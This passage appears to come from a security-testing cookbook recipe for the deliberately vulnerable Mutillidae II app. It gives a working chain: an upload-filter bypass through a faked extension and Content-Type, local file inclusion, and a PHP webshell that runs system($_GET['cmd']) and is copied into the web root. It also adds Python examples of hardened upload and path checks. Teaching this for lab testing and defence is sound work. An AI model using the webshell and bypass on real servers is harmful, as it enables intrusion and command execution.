How to do it...

For this recipe, Mutillidae II in our vulnerable VM needs to be at security level (use the Toggle Security option in the menu to set it), and Burp Suite must be configured as the proxy:

  1. In Mutillidae II's menu, go to Others | Unrestricted File Upload | File Upload.
  2. The first test will be to attempt to upload a PHP webshell. You can use one of those we used in previous chapters or make a new one. As the following screenshot shows, the upload fails and we receive a detailed description of why it failed:

From the preceding response, we can infer that files are first uploaded to /tmp on the server under a randomly generated name; the file's extension and type are then checked and, if they are allowed, the file is renamed to its original name. So, in order to upload and execute a PHP file (a webshell) on this server, we need to change its extension and the Content-Type header in the request.
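The inference above is worth pinning down from the defender's side: both things the server checks (the filename's extension and the Content-Type header) are chosen by the client, which is exactly why the recipe works. The following added example (Python, not Mutillidae's own PHP code) models that weak check next to a hardened one that derives the type from the file's leading bytes, picks the extension and stored name on the server, and keeps the file outside the web root. UPLOAD_DIR and the sample byte strings are constructed for this example.

```python
"""Upload validation: client-supplied metadata versus content-based checks.

Added example, not Mutillidae's code. weak_check() models the validation the
recipe infers from the server's error message (the extension of the supplied
filename and the Content-Type header, both chosen by the client).
strong_check() is the hardened alternative: the type is derived from the file's
leading bytes, the server picks both the extension and the stored name, and the
file lands outside the web root. UPLOAD_DIR and the sample byte strings are
constructed for this example.
"""
import os
import secrets

# Leading bytes ("magic numbers") of the image formats this handler accepts.
MAGIC = {
    b"\xff\xd8\xff": ("image/jpeg", ".jpg"),
    b"\x89PNG\r\n\x1a\n": ("image/png", ".png"),
    b"GIF87a": ("image/gif", ".gif"),
    b"GIF89a": ("image/gif", ".gif"),
}
ALLOWED_EXT = {".jpg", ".jpeg", ".png", ".gif"}
ALLOWED_MIME = {mime for mime, _ in MAGIC.values()}

UPLOAD_DIR = "/var/app/uploads"  # assumed: a directory the web server never executes from

# Constructed sample uploads: minimal JPEG/PNG headers, and PHP text disguised as in the recipe.
JPEG_SAMPLE = b"\xff\xd8\xff\xe0" + b"\x00" * 16
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
PHP_AS_JPG = b"<?php echo 'test'; ?>"


def weak_check(client_filename: str, client_content_type: str) -> bool:
    """Extension-and-header validation. Everything it looks at comes from the
    request, so renaming x.php to x.jpg and sending image/jpeg passes."""
    ext = os.path.splitext(client_filename)[1].lower()
    return ext in ALLOWED_EXT and client_content_type in ALLOWED_MIME


def sniff_type(data: bytes):
    """Return (mime, extension) from the file's own leading bytes, or None."""
    for magic, typ in MAGIC.items():
        if data.startswith(magic):
            return typ
    return None


def strong_check(client_filename: str, client_content_type: str, data: bytes):
    """Content-based validation. Returns the server-side path the file will be
    stored at, or None if it is rejected. The client's filename is used only
    for an audit log line, never for the path on disk."""
    detected = sniff_type(data)
    if detected is None:
        return None  # not one of the accepted image formats (plain PHP text fails here)
    mime, ext = detected
    if client_content_type != mime:
        return None  # header contradicts the content: treat as hostile
    # Server-generated name and server-chosen extension: even a polyglot that passes
    # the magic-byte check cannot choose a .php name or a web-root location.
    stored = os.path.join(UPLOAD_DIR, secrets.token_hex(16) + ext)
    print(f"accepted upload {client_filename!r} as {stored}")
    return stored


if __name__ == "__main__":
    print("weak  :", weak_check("sf-info.jpg", "image/jpeg"))
    print("strong:", strong_check("sf-info.jpg", "image/jpeg", PHP_AS_JPG))
    print("strong:", strong_check("photo.jpg", "image/jpeg", JPEG_SAMPLE))
```

Run stand-alone, weak_check accepts the disguised PHP file while strong_check rejects it and accepts only the real JPEG header, storing it under a random name. The magic-byte check alone is not the whole defence; the server-chosen name and the non-executable storage directory are what make a passing polyglot harmless.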

  3. Let's first try to upload a script that will tell us the working directory (document root) of the web server, so that we know where to copy our webshell once it is uploaded. Create a file sf-info.php containing the following code:

```php
<?php
// Print the web server's current working directory and list its contents
system('pwd');
system('ls');
?>
```

  4. Upload it by intercepting the upload request and changing the extension to .jpg in the filename parameter and the Content-Type to image/jpeg, as follows:

  5. Now, go to Burp Suite's Proxy History and send any GET request to Mutillidae to Repeater. We will use this to execute our recently uploaded file by exploiting a Local File Inclusion vulnerability.
  6. In Repeater, replace the value of the page parameter in the URL with ../../../../tmp/sf-info.jpg and send the request. The result, as displayed in the following screenshot, tells us the working directory of the web server and the contents of that directory:

  7. Now, let's create the webshell code and put the following code in a file named webshell.php:

```php
<?php
// Run the command given in the cmd query parameter, then show a form for the next one
system($_GET['cmd']);
echo '<p>Type a command: <form method="GET"><input type="text" name="cmd"></form></p>';
?>
```

  8. Upload the file, changing its extension and type as follows:

The question now is how to execute commands through the webshell. We cannot call it directly, as it is stored in /tmp, which is not directly accessible from the browser. We may be able to use the file inclusion vulnerability, but, as the webshell's code would be integrated with that of the including script (index.php), we would depend on that script not filtering or modifying the parameters provided. To work around those difficulties, we will upload another file to the server that renames the webshell to .php and moves it to the web root.
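The second weakness the recipe leans on is the page parameter of index.php, which includes whatever path it is given and so reaches a file in /tmp through ../ sequences. The following added example (Python, not Mutillidae's code) shows the two resolvers a defender would put in front of such an include: an allowlist that treats the parameter as a key rather than a path, and a containment check for the case where pages change too often for a fixed list. PAGES_DIR and ALLOWED_PAGES are constructed for this example.

```python
"""Resolving a 'page' parameter without a file-inclusion hole.

Added example, not Mutillidae's code. Mutillidae's index.php includes the
script named by its page parameter, which is what lets ../../../../tmp/sf-info.jpg
reach a file outside the web root. The two resolvers below close that route:
one maps the parameter through an allowlist, the other normalises the candidate
path and requires it to stay inside the pages directory with a fixed extension.
PAGES_DIR and ALLOWED_PAGES are constructed for this example.
"""
import os

PAGES_DIR = "/var/www/app/pages"  # assumed: the only directory page scripts live in
ALLOWED_PAGES = {"home", "login", "upload", "credits"}  # constructed allowlist


def resolve_by_allowlist(page: str):
    """Preferred form: the parameter is a key, not a path. Anything not in the
    allowlist, traversal sequences included, resolves to None."""
    if page not in ALLOWED_PAGES:
        return None
    return os.path.join(PAGES_DIR, page + ".php")


def resolve_by_containment(page: str):
    """Fallback when pages are added too often for a fixed allowlist: normalise
    the candidate path and require it to remain under PAGES_DIR. normpath is
    used so the example runs offline; on a live server os.path.realpath also
    resolves symlinks, at the cost of needing the file to exist."""
    if not page or "\x00" in page:
        return None
    candidate = os.path.normpath(os.path.join(PAGES_DIR, page + ".php"))
    if os.path.commonpath([PAGES_DIR, candidate]) != PAGES_DIR:
        return None  # escaped the pages directory, e.g. via ../
    return candidate


if __name__ == "__main__":
    for p in ("login", "../../../../tmp/sf-info.jpg"):
        print(p, "->", resolve_by_allowlist(p), "/", resolve_by_containment(p))
```

Either resolver turns the recipe's ../../../../tmp/sf-info.jpg into a rejected request; the allowlist is the stronger of the two because it never interprets the parameter as a path at all, and appending a fixed .php extension on the server removes the choice of file type from the client.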

  9. Send the request in which we uploaded sf-info.php to Repeater.
  10. Change the filename to rename.jpg and adjust the Content-Type.
  11. Replace the file's content with the following:

```php
<?php
// Copy the disguised webshell from /tmp into the application's web root with a .php extension
system('cp /tmp/webshell.jpg /owaspbwa/mutillidae-git/webshell.php');
system('ls');
?>
```

  12. The following screenshot shows how it should look:

  13. As we did with sf-info.jpg, execute rename.jpg by exploiting the LFI, as demonstrated in the following screenshot:

  14. Now, our webshell should be in the application's root directory. Navigate to http://192.168.56.11/mutillidae/webshell.php. The following screenshot shows system commands being executed through it:
